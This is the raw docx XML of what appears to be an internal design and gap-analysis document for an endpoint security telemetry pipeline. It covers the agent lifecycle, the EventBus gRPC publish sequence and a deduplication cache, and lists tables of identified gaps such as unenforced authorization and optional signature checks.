      <w:r>
        <w:t xml:space="preserve">  uint32 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>schema_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0233A4ED" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124AC0A3" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58CCEAF5" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>2.5 Agent Lifecycle Sequence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485E9D42" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>1. Agent.__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">__(): Load config, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> probes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C3C829" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Agent.run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(): Main loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E2CF46" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   a. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>collect_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() → List[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DeviceTelemetry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15366602" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   b. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>validate_event</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F40955" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   c. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enrich_event</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4716DAF8" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   d. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>queue_adapter.enqueue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() → SQLite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DB34CF" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   e. Queue drain: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRPC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PublishTelemetry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E85C570" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   f. Sleep for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>collection_interval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2CF4242B" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Agent.shutdown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(): Drain queue, close connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1C4E3A" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31F1E149" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>2.6 Gaps Identified at Agent Layer</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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8"/>
        <w:gridCol w:w="3376"/>
        <w:gridCol w:w="1841"/>
        <w:gridCol w:w="2915"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="2CD1973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1B2A4A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C7BAC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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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13A45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Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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5392B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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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EE0C4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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="3CF4DC5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40FC5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AG-01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DE822" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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correlation_id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not in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protobuf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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F4C06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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc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45CB2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Event linking lost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="0CA7D62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536D1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AG-02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4C185" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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device_id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only at envelope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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1041B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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc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72BCA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Extraction needs context</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="3C45D9C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E64AA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AG-03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89BD6" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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mitre_tactics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never populated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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F1E90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E74C3C"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc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4282B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Tactic analysis impossible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="69B10CA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F9CC0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AG-04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D5135" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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agent_id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field not populated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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147D3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E74C3C"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc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D674E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Multi-agent fusion blind</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="40D9C96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E488A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AG-05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1BDFC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Ed25519 signing only in queue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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23CF2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E74C3C"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc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8E5EF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Direct publishers unsigned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="48B7CE1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F79FB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AG-06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79A08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Hardcoded thresholds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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CE486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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc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7A453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High false positives</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="228F98F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AC65D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AG-07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8AE7B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 xml:space="preserve">No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DoH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>/DoT analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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A9694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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc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F62D7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Encrypted tunneling missed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="220FBCB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CF54D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AG-08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B918C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 xml:space="preserve">Linux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systemd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stub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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B6408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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc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934EA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Major persistence gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="41B8908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78BCD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AG-09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B10B7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No process binding on Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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CFCC4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E74C3C"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc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9E590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Cannot attribute DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="37C4F95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DE60F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AG-10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FA4D1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No baseline integrity check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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2B7D2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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc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2E196" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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Tamperable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baselines</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A9EE4F0" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC18C99" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Chapter 3: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EventBus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Phase 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083BB961" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>3.1 Architecture Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76437203" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Protocol: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRPC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mTLS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (TLS 1.2+). Thread pool: 50 workers. RPCs: Publish, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PublishTelemetry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PublishBatch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RegisterDevice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetHealth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetMetrics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1479CAA3" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>3.2 Publish Handler — 9-Step Sequence</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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0"/>
        <w:gridCol w:w="2932"/>
        <w:gridCol w:w="2481"/>
        <w:gridCol w:w="2807"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="5933D3B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1B2A4A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F981F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Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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BACFD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Operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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82394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Code Ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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9AB0C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On Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="5043AD2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EAE1C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A47B5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Increment request counter</w:t>
            </w:r>
          </w:p>
        </w:tc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DB4EE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server.py:1023</w:t>
            </w:r>
          </w:p>
        </w:tc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307EB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  <w:tr w:rsidR="00501EAB" w14:paraId="1FA64BE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63810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2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18C90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Check overload flag</w:t>
            </w:r>
          </w:p>
        </w:tc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A467A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server.py:1026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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EB22D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RETRY(2000ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="3370754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AC4C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3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DBA59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Validate envelope size</w:t>
            </w:r>
          </w:p>
        </w:tc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2C0E5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server.py:1035</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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F05DC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E74C3C"/>
              </w:rPr>
              <w:t>INVALID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="2D3B335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01302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4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63B59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Verify Ed25519 signature</w:t>
            </w:r>
          </w:p>
        </w:tc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F9654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server.py:1046</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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6FBEB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E74C3C"/>
              </w:rPr>
              <w:t>INVALID (optional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="765D1B1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CBF88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5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CB013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Check idempotency</w:t>
            </w:r>
          </w:p>
        </w:tc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BC9C8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server.py:1053</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="E8F8F0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8C152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27AE60"/>
              </w:rPr>
              <w:t>OK(duplicate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="7D06D00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512F3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6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4ED23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Increment inflight</w:t>
            </w:r>
          </w:p>
        </w:tc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A311A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server.py:1067</w:t>
            </w:r>
          </w:p>
        </w:tc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AA709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  <w:tr w:rsidR="00501EAB" w14:paraId="0FC3028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74229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7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1D96A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Check inflight limit</w:t>
            </w:r>
          </w:p>
        </w:tc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E8C08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server.py:1073</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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EBE31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RETRY(1000ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="44339B2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45BF1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8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80C29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 xml:space="preserve">Extract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FlowEvent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc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7520C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server.py:1080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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33EF8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E74C3C"/>
              </w:rPr>
              <w:t>INVALID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="55B047B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489C1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9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56F62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Write to WAL</w:t>
            </w:r>
          </w:p>
        </w:tc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EB3E7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server.py:1086</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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892B1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RETRY(2000ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66BD541C" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08509B54" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>3.3 Deduplication Cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1763A13C" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Structure: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OrderedDict</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[str, float]. TTL: 300 seconds. Max size: 50,000 entries. Eviction: FIFO. Thread-safe: Protected by _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dedupe_lock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642D4BB8" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>3.4 Signature Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BEB247" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Algorithm: Ed25519. Default: OPTIONAL (REQUIRE_SIGNATURES=false). CRITICAL: Default is to ACCEPT unsigned envelopes for backward compatibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CA1EDF" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.5 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EventBus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Gaps</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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8"/>
        <w:gridCol w:w="3376"/>
        <w:gridCol w:w="1841"/>
        <w:gridCol w:w="2915"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="16FD09E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1B2A4A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EF2A8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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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FDFDD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Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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BEA0B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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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E69C8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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="7B857BE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2B513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EB-01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94390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Authorization NOT enforced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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1C4D9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E74C3C"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc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9BB5C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 xml:space="preserve">Any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mTLS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client publishes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="74EDAEF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04C8D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EB-02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5970F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Signature verification OFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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1127B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E74C3C"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc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EF870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Unsigned events accepted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="33AA887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EF2A1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EB-03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EF8B6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No replay protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
